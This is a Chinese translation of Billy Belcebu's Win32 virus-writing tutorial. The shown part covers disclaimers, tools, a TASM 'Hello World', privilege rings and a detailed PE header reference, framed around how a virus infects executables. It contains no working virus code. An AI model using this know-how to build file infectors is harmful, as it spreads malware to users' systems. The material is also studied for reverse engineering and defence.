本文内容可以到这里下载:
http://bbs.pediy.com/upload/files/1085719190.rar
Billy Belceb病毒编写教程---Win32篇
翻译:onlyu
【译者声明】
~~~~~~~~~~~
这是一篇关于病毒基础知识的教程,作者Billy Belceb,西班牙人,在16岁时写的这篇教程,曾创建了病毒组织DDT。翻译这篇教程的目的是想揭开病毒的神秘面纱,从编写病毒的角度来学习病毒,希望对大家有用。由于原文为西班牙人写的英文,译者翻译教程也不多,英语只是凑合,错误之处还请大家原谅,如果大家发现翻译有什么不当之处,欢迎改正,大家也可对照原文学习。(原文在29A#4中)。大家都知道,我们脱一个壳经常见到某某壳用了某某病毒技术,到底病毒技术是那些呢?比较经典而全面的Win32病毒教程就是Billy Belceb写的本教程,可惜一直没有人翻译成中文,我作为一个大傻鸟,就决定翻译了。谨以此翻译献给所有的Cracker和所有对Win32汇编感兴趣的人。下面为原文译文,祝你好运!
【声明】
~~~~~~~
作者对因对此文档使用不当而造成的任何损失概不负责。这篇教程的目的是教会人们编写病毒和防护一些破坏力大的病毒的破坏。这篇教程仅作为教学目的。所以,如果有人利用这篇文章编写了破坏力很大的病毒,我可不负责任。如果通过这篇文章你看到我鼓励人们破坏数据的字眼,先去买副眼镜再说。
【介绍】
~~~~~~~
亲爱的同志们,大家好,你还记得Billy Belceb的病毒编写教程吗?那是一篇关于过时的MS-DOS病毒的教程。在那篇教程中,我一步一步地介绍了很多有名的DOS病毒技术的知识,而且它是为初学者写的,使他们尽快地入门。现在,我又写了一篇很酷(我希望是)的教程,但是这一次我将介绍现在计算机的新威胁,Win32病毒,毫无疑问,所有的东西都是和那个有关了。我发现现在一个完整的教程很缺,所以我曾问自己...为什么我不写一篇关于这个的教程?所以我又写出来了:)真正的在Win32病毒的先驱是VLAD组织,而用这种方式来写教程的作者是Lord Julus。但是我不会忘记那些写了很多有趣教程的人,和在Lord Julus的教程之前的所有相关东西,当然我在说JHB啦。有趣的技术是由Murkry研究的,后来Jacky Qwerty...我希望我没有忘记在Win32病毒编写(很短)史上的重要的人。注意我从来没有忘本。象在我的病毒编写教程系列里一样,我要谢谢一些音乐组织,如Blind Guardian,HammerFall,Stratovarius,Rhapsody,Marilyn Manson,Iron Maiden,Metallica,Iced Earth,RAMMS+EIN,Mago De Oz,Avalanch,Fear Factory,Korn,Hamlet 和Def Con Dos。所有这些东西营造了写一篇巨大的教程和代码的完美的氛围。
嗨,我的教程的结构已经有了很大的改变,现在我给出一个索引,几乎所有给出的代码都是我编写的,或者基于其他人的但是被我改编了的,或者有一点删改的;)但是,嗨,我已经努力的解决在我的现在已经绝种了的MS-DOS(RIP)版VWG中遇到的所有问题。
我必须向Super/29A问好,是他帮助了这篇教程的一些方面的东西,他是我的beta测试人之一,而且他已经对这篇教程贡献了一些东西。
说明:英语不是我的母语(西班牙语才是)【译者注:所以这篇西班牙式的病毒教程很难翻译,不当之处还请原谅】,所以原谅我的许多拼写错误,请告知我,我会修正的。我已经引用了已经在一些独立的病毒杂志里发表了的文章,但是它们仍然值得一读因为我已经修改了,进行了语法检查,并加入了一些额外的信息。记住:这篇文章并不完美,所以原谅在这篇教程中的错误。
----------跟我联系
-E-mail billy_belcebu@hotmail.com billy_belcebu@cryogen.com
-ICQ # 22290500
个人主页 http://members.xoom.com/billy_bel http://www.cryogen.com/billy_belcebu
组织主页 http://sourceofkaos.com/homes/ddt
IRC [Billy_Bel] Undernet #vir, Irc-Hispano #virus
祝玩得快乐!
Billy Belceb
美梦从这里开始...
(c) 1999 Billy Belcebu/iKX
【索引】
~~~~~~~
有人(Hi Qozah!)已经告诉我,当他读这篇教程的beta版本时,它有一点混乱,因为容易迷失在各章之间。无论如何,我已经对这个重新组织了,我仍然很混乱,而且我的教程也是:)
01.声明
02.介绍
03.索引
04.病毒编写中的有用的东西
05.简单介绍
06.PE 文件头
07.Ring-3,用户级编码
08.Ring-0,系统级编码
09.Per-Process residency
10.Win32优化
11.Win32反调试
12.Win32多态
13.高级Win32技术
14.附录一:病毒发作
15.附录二:关于作者
16.结束语
【病毒编写中的有用的东西】
~~~~~~~~~~~~~~~~~~~~~~~~~
在开始编写病毒之前,你需要一些东西。下面是我给你推荐的程序(如果你没有足够的金钱来买它们...下载!) :)
Windows 95 或 Window NT 或 Windows 98 或 Windows 3.x + Win32s :)
TASM 5.0 包(包括TASM32 和 TLINK 32)
SoftICE 3.23+(或更好) for Win9X,和 for WinNT。
API 列表(Win32.HLP)
Windows95 DDK,Windows98 DDK,Windows2000 DDK...即所有的微软DDK和SDK。
强烈推荐Matt Pietrek关于PE文件头的文章。
Jacky Qwerty的PEWRSEC工具(在你在';.code';里添加代码时用)。
一些hash...哦,shit!它是我想要的! :)
一些电子杂志如29A(#2,#3),Xine(#2,#3,#4),VLAD(#6),DDT(#1)...
一些Windows病毒,如Win32.Cabanas,Win95.Padania,Win32.Legacy...
一些Windows病毒查杀工具(强烈推荐NODICE32)->www.eset.sk
Neuromancer,by William Gibson,它是一本好书。
毫无疑问,这篇教程!
我希望没有忘掉任何重要的东西。
【简要介绍】
~~~~~~~~~~~
好了,开始把你的大脑中的16位MS-DOS编码概念,迷人的16位偏移地址,中断,驻留内存的方法...都清除掉。所有这些我们已经使用了很多年的东西,现在已经再也不用了。是的,它们确实现在用不到了。在这篇教程里面,当我说Win32,我的意思是Windows 95(normal,OSR1,OSR2),Windows 98,Windows NT或Windows 3.x+Win32s。最最明显的变化,至少在我看来是由中断变成了API,在这之前是由16位寄存器和偏移地址变到了32位的。Windows给我们开了使用其它语言代替ASM(和C)的方便之门,但是我仍然对ASM情有独钟:利用它能更好的理解一些东西和更容易的优化(hi Super!)。正如我在上面所说的,你必须使用一种新东西叫做API。你必须知道这些参数必须在堆栈中,而且调用这些API是使用的CALL。
注:在上面我把上面所有提到的平台叫做Win32,我把Win95(它的所有版本)和Win98叫做Win9x,把Windows 2000叫做Win2k。请注意这一点。
%由16位到32位编程的改变%
~~~~~~~~~~~~~~~~~~~~~~~~
我们现在将会使用双字(DWORD)而不是单字(WORD)了,而这个改变将会给我们一个全新的世界。在已知的CS,DS,ES和SS:FS,GS之外,我们又多了两个段。而且我们有32位寄存器如EAX,EBX,ECX,EDX,ESI,EDI,EBP和ESP。让我们来看看对这些寄存器怎么操作:假如我们要使用EAX的less significant word(简称LSW),我们该怎么做呢?这个部分可以使用AX来访问,即处理LSW。假如EAX=0000000,我们想要在它的LSW放置1234h。我们必须简单地使用一个"mov ax,1234h"就可以了。但是如果我们想要访问EAX的MSW(Most Significant Word),该怎么做呢?为了达到这个目的我们不能使用一个寄存器了:我们必须使用ROL。问题并不是在这里,它是把MSW值移到了LSW。
当我们得到一个新语言的时候,我们总是要试的一个经典的例子:"Hello world!" :)
%Win32中的Hello World%
~~~~~~~~~~~~~~~~~~~~~~
它很简单,我们必须使用"MessageBoxA"这个API,所以我们用大家已经知道的"extrn"命令来定义它,把参数压栈然后调用这个API。注意这个字符串必须为ASCIIZ(ASCII,0),记住参数必须以相反的顺序压栈。
;-------从这里开始剪切----------------------------------------------------
.386 ; Processor (386+)
.model flat ; Uses 32 bit registers
extrn ExitProcess:proc ; The API it uses
extrn MessageBoxA:proc
;-
;利用"extrn"我们把在程序中要用到的所有API列出来。ExitProcess是我们用来把
;控制权交给操作系统的API,而MessageBoxA用来显示一个经典的Windows消息框。
;-
.data
szMessage db "Hello World!",0 ; Message for MsgBox
szTitle db "Win32 rocks!",0 ; Title of that MsgBox
;------------------------------------------------------------------------------------------------------------------------------
;这里我们不能把真正病毒的数据放这里了,因为这是一个例子,我们不能
;使用它,而且又因为如果我们不在这里放置一些数据,TASM将会拒绝汇编。
;无论如何...在第一次产生你的病毒主体的时候用它放置数据。
;-
.code ; Here we go!
HelloWorld:
push 00000000h ; Sytle of MessageBox
push offset szTitle ; Title of MessageBox
push offset szMessage ; The message itself
push 00000000h ; Handle of owner
call MessageBoxA ; The API call itself
;------------------------------------------- ; int MessageBox(
; HWND hWnd, // handle of owner window
; LPCTSTR lpText, // address of text in message box
; LPCTSTR lpCaption, // address of title of message box
; UINT uType // style of message box
; );
;
;在调用这个API之前,我们把参数压栈,如果你还记得,堆栈使用那个迷人的
;东西叫做LIFO(后进先出Last In First Out),所以我们要按相反的顺序来
;压参数。让我们看看这个函数的每个参数的简要描述:
;
; hWnd:标志将要被创建的消息框的宿主窗口(owner window)。
; 如果这个参数是NULL,这个消息框没有宿主窗口。
; lpText:指向以空字符结尾的包含将要显示消息的字符串的指针。
; lpCaption:指向一个以空字符结尾的字符串的指针,这个字符串是这个
; 对话框的标题。如果这个参数是一个NULL,缺省的标题Error被使用。
; uType:以一些位标志来确定对话框的样式和行为。这个参数可为一些标志的组合。
;-
push 00000000h
call ExitProcess
;--------------------------------------------------------------------------------------------------------------------
; VOID ExitProcess(
; UINT uExitCode // exit code for all threads
; );
; 这个函数在Win32环境下相当于著名的Int 20h,和Int 21h的00,4C功能等等。
; 它是关闭当前进程的简单方式,即结束程序执行。下面给出唯一的一个参数:
;
; uExitCode:标志进程退出的代码,并作为所有线程终止时的代码。使用
; GetExitCodeProcess函数来刷新这个进程的退出值。使用GetExitCodeThread
; 函数来刷新一个线程的退出值。
;-
end HelloWorld
;-----到这里为止剪切-------------------------------------------------------
正如你看到的,编写代码很简单。可能没有16位环境下那么简单,但是如果你考虑到32位所带给我们的优点确实很简单了。现在,既然你已经知道怎么来编写"Hello World",你就有能力来感染整个世界了;)
%Rings%
~~~~~~~
我知道你对下面的东西很害怕,但是,正如我所演示的,它看起来没有那么难。让我们记住你必须清楚的东西:处理器有4个特权级别:Ring-0,Ring-1,Ring-2和Ring-3,越往后就有越多的限制,而病毒要是用第一个特权级别,几乎编码时没有任何限制。只要记住在迷人的DOS下面,我们总是处于Ring-0...现在想到在Win32平台下你还可以做相同的事情...好了,停止幻想了,让我们开始工作。
Ring-3还表示"用户"级,在这个级别下,我们有很多的限制,那确实不能我们的需要。Microsoft程序员在他们发行Win95的时候犯了个错误,声称它是"无法感染"的,正如在这个操作系统卖出去之前所表明的,利用可怕的Bizatch(后来改名为Boza,但那是另外一段历史了)。他们认为这些API不能被一个病毒访问和使用,但是他们没有想到病毒编写者们的超级智慧,所以...我们可以在用户级下编写病毒,毫无疑问,你只要看看大量近期发布的新的Win32运行期病毒,它们都是Ring-3级下的...它们不差,不要误解了我,Ring-3病毒是现在有可能感染所有Win32环境下文件的病毒。它们是未来...主要是因为即将发布的Windows NT 5.0(或者Windows 2000)。我们不得不寻找能使我们的病毒(由Bizatch生成的病毒传播很差,因为它对API地址"harcoded",并且它们可能会因Windows版本的改变而改变)存活的API,而且我们可以用其它不同的方法来实现,正如我后面解释到的。
Ring-0是另外一段历史了,和Ring-3有着很大的区别。在这个级别下我们拥有内核编码的级别,"内核(kernel)级别"。是不是很迷人啊?我们可以访问端口,放置我们还没有梦想过的代码...和原先的汇编最接近的东西。我们不使用一些已知的花招是不能直接访问一些东西的,如IDT修改,SoPinKy/29A在29A#3里发表的"Call Gate"技术,或者VMM插入,在Padania或者f##k Harry病毒里见到的技术。当我们直接利用VxD的服务时,我们不需要API,而且它们的地址在所有Win9x系统中是被假设为相同的,所以我们"hardcode"它们。我将在fully dedicated to Ring-0这一章里面深入讨论。
%重要的东西%
~~~~~~~~~~~~
我想无论如何我应该在这篇教程的开头放上这些,然而我知道知道总比不知道好啊:)好了,让我们来讨论Win32操作系统内部的东西。
首先,你必须清楚一些概念。让我们从selector开始。什么是一个selector呢?相当简单,它是一个非常大的段,而且它组成了Win32的内存,也叫做平坦内存。我们可以用4G内存(4,294,967,295字节),仅仅通过使用32位地址。那所有这些内存是怎么组织的呢?看看下面的示意图:
__________________________
| |<-------OFFSET=00000000h <-> 3FFFFFFFh
| 应用程序代码和数据 |
|__________________________|
| |<-------OFFSET=40000000h <-> 7FFFFFFFh
| 共享内存 |
|__________________________|
| |<-------OFFSET=80000000h <-> BFFFFFFFh
| 内核 |
|__________________________|
| |<-------OFFSET=C0000000h <-> FFFFFFFFh
| 设备驱动 |
|__________________________|
结果:我们拥有4G可用内存。是不是很迷人啊?
注意一件事情:WinNT的后两段是分开的。现在我将给出你必须知道的一些定义,其它的一些本文之外的一些概念,我假设你已经知道了。
VA:
VA表示Virtual Address,即某些程序的地址,但是在内存中(记住在Windows中在内存中和在磁盘上是不一样的)。
RVA:
RVA表示Relative Virtual Address。清楚这个概念很重要,RVA是文件在内存映射(由你或由系统)时的偏移地址。
RAW Data:
RAW Data是我们用来表示数据物理的存储的,也就是说,在磁盘(磁盘上的数据!=内存中的数据)上的存储。
Virtual Data:
Virtual Data是指那些已经被系统载入内存的数据。
File Mapping:
一种技术,在所有的Win32环境下都有,由一种快速的(并使用更少内存)文件操作方法和比DOS更容易理解的方法组成。所有我们在内存中改变的东西,在磁盘上也会改变。文件映射还是所有Win32环境(甚至NT)下内存之间交换信息的唯一方法。
%怎么来编译东西%
~~~~~~~~~~~~~~~~
该死,我几乎忘记了这个:)编译一个Win32 ASM程序的通常参数是,至少在这篇教程的所有例子中,按如下(当ASM文件的名字为';program';,但是没有任何扩展名):
tasm32 /m3 /ml program,,;
tlink32 /Tpe /aa program,program,,import32.lib
pewrsec program.exe
我希望足够清晰了。你还可以使用makefiles,或者建立一个bat文件来使它自动完成(就象我做的!)。
【PE文件头】
~~~~~~~~~~
这是这篇文件的最重要的一章。仔细读!
%介绍%
~~~~~~
对PE头的结构很清晰在写我们的Windows病毒很重要。下面我将给出我认为重要的东西,但是并不是关于PE文件的所有的信息,想要知道更多的东西,看看我在上面关于PE文件推荐的资料,在"有用的东西..."这一章。
_______________________________
| |<-----OFFSET=00000000h
| DOS stub |
|_______________________________|
| |<-----OFFSET=[DOS Stub+3Ch]
| PE stuff |
|_______________________________|
让我们对这两大部分进行深入的分析,让我们看看Micheal J. O';Leary的示意图:
__________________________________
| |<----Base of Image Header
| DOS compatible EXE header |--|
|__________________________________| |
| | |
| Unused | |
|__________________________________| |
| | |
| OEM identifier | |
|__________________________________| |
| | |
| OEM info | |-->Uninteresting(DOS Compatibility)
|__________________________________| |
| | |
| Offset to PE Header |----->Very interesting
|__________________________________| |
| | |
| DOS Stub program and reloc table | |
|__________________________________| |
| | |
| Unused |__|
|__________________________________|
| |
| PE header(IMAGE_FILE_HEADER) |--|
|__________________________________| |
| | |
| PE header(IMAGE_OPTIONAL_HEADER) | |
|__________________________________| |-->Very very interesting :)
| | |
| Section Table | |
|__________________________________| |
| | |
| Sections |__|
|__________________________________|
现在你已经对PE文件头已经有了一个大体的了解,确实很新奇(但也很复杂),我们的新目标。Ok,ok,你对那些东西有了一个"大体"的了解,但是,你仍然需要知道PE文件头中IMAGE_FILE_HEADER本身的内部结构。勒紧你的裤腰带!
IMAGE_FILE_HEADER
^^^^^^^^^^^^^^^^^
________________________________
| "PE\0\0" |<----+00000000h
|________________________________| Size:1 DWORD
| Machine |<----+00000004h
|________________________________| Size:1 WORD
| Number Of Section |<----+00000006h
|________________________________| Size:1 WORD
| Time Date Stamp |<----+00000008h
|________________________________| Size:1 DWORD
| pointer To Symbol Table |<----+0000000Ch
|________________________________| Size:1 DWORD
| Number Of Symbols |<----+00000010h
|________________________________| Size:1 DWORD
| Size Of Optional Header |<----+000000014h
|________________________________| Size:1 WORD
| Characteristics |<----+000000016h
|________________________________| Size:1 WORD
Total Size:18h BYTES
我将继续对IMAGE_FILE_HEADER的各个域给出简要的描述。
PE\0\0:
它是每个PE文件都有的标志,只要在编写你的感染程序的时候检查它是否存在。如果它在那儿,它就不是一个PE文件,ok?
Machine:
因为我们所使用的计算机的理想可以是一个非PC兼容的(NT对这些东西有一个开放等级,你知道的),又因为PE文件是普遍的,在这个域中是这个应用程序所编写的代码的机器类型,可以为下面的值:
IMAGE_FILE_MACHINE_I386 equ 14Ch ; Intel 386.
IMAGE_FILE_MACHINE_R3000 equ 162h ; MIPS little-endian,160h big-endian
IMAGE_FILE_MACHINE_R4000 equ 166h ; MIPS little-endian
IMAGE_FILE_MACHINE_R10000 equ 168h ; MIPS little-endian
IMAGE_FILE_MACHINE_ALPHA equ 184h ; Alpha_AXP
IMAGE_FILE_MACHINE_POWERPC equ 1F0h ; IBM PowerPC Little-Endian
Number Of Sections:
我们的感染程序的非常重要的域,它告诉我们这个文件的节(section)的个数。
Time Date Stamp:
保存了从1969.10.31 4:00到文件连结时所过的秒数。
Pointer To Symbol Table:
没意思,因为它仅仅被OBJ文件使用。
Number Of Symbols:
没意思,因为它仅仅被OBJ文件使用。
Size Of Optional header:
保存了IMAGE_OPTIONAL_HEADER域的字节数(看下面IMAGE_OPTIONAL_HEADER的描述)。
Characteristics:
这些标志给了我们关于这个文件的更多信息,对于我们所有人都没意思。
IMAGE_OPTIONAL_HEADER
^^^^^^^^^^^^^^^^^^^^^
________________________________
| Magic |<----+00000018h
|________________________________| Size:1 WORD
| Major Linker Version |<----+0000001Ah
|________________________________| Size:1 BYTE
| Minor Linker Version |<----+0000001Bh
|________________________________| Size:1 BYTE
| Size Of Code |<----+0000001Ch
|________________________________| Size:1 DWORD
| Size Of Initialized Data |<----+00000020h
|________________________________| Size:1 DWORD
| Size of UnInitialized Data |<----+00000024h
|________________________________| Size:1 DWORD
| Address Of Entry Point |<----+00000028h
|________________________________| Size:1 DWORD
| Base Of Code |<----+0000002Ch
|________________________________| Size:1 DWORD
| Base Of Data |<----+00000030h
|________________________________| Size:1 DWORD
| Image Base |<----+00000034h
|________________________________| Size:1 DWORD
| Section ALignment |<----+00000038h
|________________________________| Size:1 DWORD
| File Alignment |<----+0000003Ch
|________________________________| Size:1 DWORD
| Major Operating System Version |<----+00000040h
|________________________________| Size:1 WORD
| Minor Operating System Version |<----+00000042h
|________________________________| Size:1 WORD
| Major Image Version |<----+00000044h
|________________________________| Size:1 WORD
| Minor Image Version |<----+00000046h
|________________________________| Size:1 WORD
| Major Subsystem Version |<----+00000048h
|________________________________| Size:1 WORD
| Minor Subsystem Version |<----+0000004Ah
|________________________________| Size:1 WORD
| Reserved1 |<----+0000004Ch
|________________________________| Size:1 DWORD
| Size Of Headers |<----+00000050h
|________________________________| Size:1 DWORD
| CheckSum |<----+00000054h
|________________________________| Size:1 DWORD
| SubSystem |<----+00000058h
|________________________________| Size:1 DWORD
| Dll Characteristics |<----+0000005Eh
|________________________________| Size:1 WORD
| Size Of Stack Reserve |<----+00000060h
|________________________________| Size:1 DWORD
| Size Of Stack Commit |<----+00000064h
|________________________________| Size:1 DWORD
| Size OF Heap Reserve |<----+00000068h
|________________________________| Size:1 DWORD
| Size Of Heap Commit |<----+0000006Ch
|________________________________| Size:1 DWORD
| Loader Flags |<----+00000070h
|________________________________| Size:1 DWORD
| Number Of Rva And Sizes |<----+00000074h
|________________________________| Size:1 DWORD
Total Size:78h BYTES
(加上IMAGE_FILE_HEADER ^^^^^^^^^)
Magic:
看起来总为010Bh,实际上会使我们认为它是一种签名,没有意思。
Major Linker Version and Minor Linker Version:
产生这个文件的连结器的版本,没有意思。
Size of Code:
它是所有包含可执行代码的段的总字节数。
Size of Initialized Data:
它是所有包含初始数据的段的总大小。
Size of Uninitialized data
未初始数据不占磁盘空间,但是当系统装载这个文件的时候,它会分配一些内存(实际上是虚拟内存)。
Address of EntryPoint:
是装载器开始执行代码的地方。它是一个RVA,当系统装载这个文件的时候和image base相关。非常有意思。
Base Of Code:
是文件的code段开始的RVA。code段在内存中通常在data段之前,在PE文件头之后。这个RVA在用Microsoft连结器产生的EXE文件中通常为0x1000。Borland的TLINK32看起来把image base加到了第一个code段的RVA处,并把结果存储在这个域中。
Base Of Data:
是文件的data段开始的RVA,data段通常在内存中处于最后,在PE文件头和code段之后。
Image Base(基址):
当连结器创造一个可执行文件的时候,它会假定将会内存映射到内存的某个地址当中。这个地址被保存在这个域中,假定的一个装载地址来允许连结器进行优化。如果这个文件确实被装载器内存映射到那个地址,在它可以运行之前代码就不需要任何补丁了。在为Windows NT产生的可执行文件中,缺省的Image Base为0x10000。对DLL来说,缺省的为0x400000。在Win9X中,地址0x10000不能被用来装载EXE文件因为它在被所有进程的共享地址中。因为这个,Microsoft就把Win32的缺省Image Base改为0x400000。老的以基址0x10000进行连结而成的可执行文件在Win9x下装载将会花费更长的时间,因为装载器需要进行基址重定位。
Section Alignment:
当映射到内存中的时候,每一节要保证是这个值的一个倍数的虚拟地址作为开始地址。对于按页的时候,缺省的节对齐方式是0x1000。
File Alingnment:
在PE文件中,构成每一节的原始数据要保证从这个值的倍数开始。缺省的值为0x200字节,可能是为了保证各节总是以磁盘节(disk sector,它的长度也为0x200)的开始作为开始。这个域在NE文件中等价于segment/resource alignment。和NE文件不同的是,PE文件通常不会有成百个节,所以由于对齐文件的节而浪费的空间几乎很少。
Major Operating System Version and Minor Operating System Version:
使用这种类型的可执行文件的操作系统的最低版本号。既然subsystem fields目的看起来和它相类似,这个域有点摸棱两可。这个域在所有的Win32 EXE文件中缺省为1.0。
Major Image Version and Minor Image Version:
是一个用户可定义的域,它允许你可以有不同版本的EXE或DLL。你可以通过连结器的/VERSION开关来设置这个域。如:"LINK /VERSION:2.0 muobj.obj"。
Major Subsystem Version and Minor Subsystem Version:
包含了运行这个可执行文件所需要的最小子系统版本。这个域的一个经典值为3.10(意思为Windows NT 3.1)。
Reserved1:
看起来总为0(最为感染标志太完美了)。
Size Of Headers:
PE文件头的大小和节(对象)表。这些节的原始数据就从这些所有文件头组件之后开始。
Checksum:
为这个文件的CRC校验值。正如在其它的Microsoft可执行文件格式中,这个域是忽略的并总设为0,这个规则的例外是这些EXE文件必须有合法的校验值。
SubSystem:
这些可执行文件的子系统的类型被它用来用户界面。WINNT.h定义了下面的值:
NATIVE 1 Doesn';t require a subsystem (such as a device driver)
WINDOWS_GUI 2 Runs in the Windows GUI subsystem
WINDOWS_CUI 3 Runs in the Windows character subsystem (console app)
OS2_CUI 5 Runs in the OS/2 character subsystem (OS/2 1.x only)
POSIX_CUI 7 Runs in the Posix character subsystem
一个标志集表明了在什么环境下一个DLL的初始函数(如DLLMain)将会调用。这个值看起来总是设置为0,然而操作系统仍然对所有四个事件调用DLL初始函数。下面是定义的值:
1 当DLL第一次装载到一个进程的地址空间中时调用
2 当一个线程终止时调用
3 当一个线程开始时调用
4 当DLL已经存在时调用
Size Of Stack Reserve:
为初始线程的堆栈而保留的虚拟内存数量,然而并不是所有的内存都可以做(看下一个域)。这个域的缺省值为0x100000(1MB)。如果你用CreateThread把0作为堆栈的大小,那么创建出来的堆栈就会有相同的大小。
Size Of Stack Commit:
保证初始线程的堆栈时的内存数量。对于Microsoft的连结器这个域的初始值为0x1000字节(1页)而TLINK32为2页。
Size Of Heap Reserve:
用来保留给初始进程堆时的虚拟内存,这个堆的句柄可以通过调用GetProcessHeap函数来获得。并不能保证所有内存(看下一个域)。
Size Of Heap Commit:
在进程堆中初始时的内存数量。缺省值为1页。
Loader Flags:
从WINNT.h来看,这个域和调试支持相关。我还没有看到任何一个这些位都有效的可执行文件,也没有看到这些位都清空的。怎么用连结器设置它们呢,下面是定义的值:
1 在开始进程前唤醒一个断点指令
2 当进程已经载入后唤醒一个调试器
Number Of Rva and Sizes:
DataDirectory 数组(下面)的入口个数,这个值用当前的工具总是设置为16。
IMAGE_SECTION_HEADER
^^^^^^^^^^^^^^^^^^^^
_____________________________
| Section Name |<-----Begin of section header
|_____________________________| Size:8 BYTES
| Virtual Size |<-----+00000008h
|_____________________________| Size:1 DWORD
| Virtual Address |<-----+0000000Ch
|_____________________________| Size:1 DWORD
| Size Of Raw Data |<-----+00000010h
|_____________________________| Size:1 DWORD
| Pointer To Raw Data |<-----+00000014h
|_____________________________| Size:1 DWORD
| Pointer To Relocations |<-----+00000018h
|_____________________________| Size:1 DWORD
| Pointer To Line Numbers |<-----+0000001Ch
|_____________________________| Size:1 DWORD
| Number Of Relocations |<-----+00000020h
|_____________________________| Size:1 WORD
| Number Of Line Numbers |<-----+00000022h
|_____________________________| Size:1 WORD
| Characteristics |<-----+00000024h
|_____________________________| Size:1 DWORD
Total Size: 28h BYTES
Section Name:
命名节用的是一个8-byte的ANSI名字(非UNICODE),大多数的节的名字以一个.(如".text")作为开始,但是这不是必须的,你可以在一些关于PE的文章里验证这一点。你可以直接用汇编语言来命名你的节,或者在Microsoft C/C++编译器下用"#pragma data_seg"和"pragma code_seg"。注意节名是否占了满满8个字节很重要,没有NULL终止符。如果你是一个printf的热爱者,你可以使用%.8s来避免把名字字符串拷贝到另外一个你可以用NULL来终止的缓冲区里面。
Virtual Size:
这个域在EXE或者OBJ中有不同的意思。在一个EXE中,它存储代码或者数据的实际大小。这个大小是在把文件凑整到文件对齐大小的倍数之前的大小。后面的SizeOfRawData域(看起来有点用词不当)存储的是凑整之后的值。Borland的连接器把这两个域的意思颠倒过来了,看起来是正确的。对于OBJ文件,这个域表示节的物理地址。第一个节是从地址0开始的。为了寻找在一个OBJ文件中的下一个节的物理地址,把当前节的物理地址加上SizeOfRawData值就可以了。
Virtual Address:
在EXE中,这个域指装载器应该对节进行映射的RVA。为了计算一个给定的节在内存中的真正起始地址,把映象的基址加上存储在这个域中的VirtualAddress就可以了。利用Microsoft的工具,第一个节的缺省的RVA为0x1000。在OBJ文件中,这个域是没有意义的并设置成0。
Size Of Raw Data:
在EXE中,这个域包含了节在按文件对齐大小凑整之后的大小。例如,假设一个文件的对齐大小为0x200,如果上述的VirtualSize域的节的长度为0x35A,这个域就会以0x400作为节长。在OBJ文件中,这个域包含了由编译器或汇编程序所设置的精确大小。也就是说,对于OBJ文件来说,它等于EXE中的VirtualSize域的值。
Pointer To Raw Data:
这是节基于文件的偏移量,原始数据是由编译器或汇编器设置的。如果你的程序内存映射了一个PE文件或者COFF文件本身(而不是由操作系统来装载它),这个域比VirtualAddress域重要。在这种情况下,你将会拥有完全的线形文件映射,所以你将会发现在这个偏移地址出的节的数据,而不是在VirtualAddress处的特定RVA。
Pointer To Relocations
在OBJ文件中这个是节基于文件的偏移量的重定位信息,对于每一个节的重定位信息直接跟在那个节的原始数据后面。在EXE文件中这个域(和子域)是没有意义的并设置成0。当连接器产生EXE文件的时候,它解决了大多数的修正问题,只剩基址重定位和输入函数。关于基址重定位和输入函数的信息是保存在它们自己的节中,所以没有必要使一个EXE文件的每一个节的重定位数据在原始节数据后面。
Pointer To Line Numbers:
这是基于文件的行号表的偏移量,一个行号表使源文件的行号和一个给定的行所产生的代码地址相关联。在现代的调试格式如CodeView格式中,行号信息是作为调试信息的一部分存储的。在COFF调试格式中,然而,行号信息是和符号名/符号类型分开存储的。通常,只有code节(如.text)有行号。在EXE文件中,行号是在节的raw data(原始数据)之后向文件尾累加的。在OBJ文件中,一个节的行号表是在原始节数据和这个节的重定位表之后开始的。
Number Of Relocations:
在节的行号表中的行号的数值(上面的PointerToLinenumbers域)。
Characteristics:
大多数程序员叫做标志(flag),在COFF/PE格式中叫做特征(characterstic)。这个域是一些表面节属性(如代码/数据,可读,或可写)的标志。要看所有可能的节属性的列表,看看定义在WINNT.H中的IMAGE_SCN_XXX_XXX。下面给出一些比较重要的标志:
0x00000020 这个节包含代码。通常和可执行标志(0x80000000)联合设置。
0x00000040 这个节包含了初始化了的数据(initialized data)。除了可执行和.bss节之外几乎所有的节都有这个标志。
0x00000080 这个节包含了未初始化的数据(uninitialized data),如.bss节。
0x00000200 这个节包含了一些注释或者一些其它类型的信息。这个节的一个典型利用是由编译器所设置的.drectve节,这个节包含了连接器的命令。
0x00000800 这个节的内容是不应该放在最终的EXE文件中的。这些节被编译器/汇编器用来传递信息给连接器。
0x02000000 在它被装载之后,进程就不再需要它了,这个节就可以被丢弃。最普通的可丢弃的节是基址重定位节(.reloc)。
0x10000000 这个节是可共享的。当使用一个DLL时,这个节中的数据将会通过DLL来给所有的进程共享。数据节的默认是不共享的。用更专业的术语,一个共享节告诉内存管理器设置这个节的页映射使得所有使用这个DLL的进程指向内存中的同一个物理页。要使一个节可共享的,在连接的时候使用共享(SHARED)属性。如:
LINK /SECTION:MYDATA,RWS...
就告诉了连接器一个叫做MYDATA的节是可读的,可写的,而且是共享的。
0x20000000 这个节是可执行的。这个标志通常在"包含代码"的标志(0x00000020)被设置后设置。
0x40000000 这个节是可读的。这个标志几乎在EXE文件的所有节中都被设置。
0x80000000 这个节是可写的。如果这个标志在一个EXE文件的节中没有被设置,装载器就会标志内存映射页为只读的或只能执行的。有这个属性的典型的节是.data和.bss。有趣的是,.idata节也设置了这个属性。
%要改变的东西%
~~~~~~~~~~~~~~
下面,我将介绍在编写一个普通的PE病毒时的一些改变。假设你要编写一个会增加PE文件的最后一个节内容的病毒,这个在我们看来更容易成功的技术,然而添加一个节更容易。让我们看看一个病毒是怎么来改变一个可执行文件的头。我使用了Lord Julus[SLAM]的INFO-PE程序。
-------- DOS INFORMATION ---------------------------------------------------
Analyzed 文件: GOAT002.EXE
DOS Reports:
?File Size - 2000H (08192d)
?File Time - 17:19:46 (hh:mm:ss)
?File Date - 11/06/1999 (dd/mm/yy)
?Attributes : Archive
[...]
-------- PE Header ----------------------------------------------------------
---------------
‖O_DOS |O_PE ‖(Offset from Dos Header / PE Header
‖------|------‖
|0100H |0000H | PE Header Signature - PE/0/0
|0104H |0004H | The machine for this EXE is Intel 386 (value = 014CH)
|0106H |0006H | Number of sections in the file - 0004H
|0108H |0008H | File was linked at : 23/03/2049
|010CH |000CH | Pointer to Symbol Table : 00000000H
|0110H |0010H | Number of Symbols : 00000000H
|0114H |0014H | Size of the Optional Header : 00E0H
| | |
|0116H |0016H | File Characteristics - 818EH :
| | | ?File is executable
| | | ?Line numbers stripped from file
| | | ?Local symbols stripped from file
| | | ?Bytes of machine word are reversed
| | | ?32 bit word machine
| | | ?Bytes of machine word are reversed
‖_______|_____‖
-------- PE Optional Header -----------------------------------
---------------
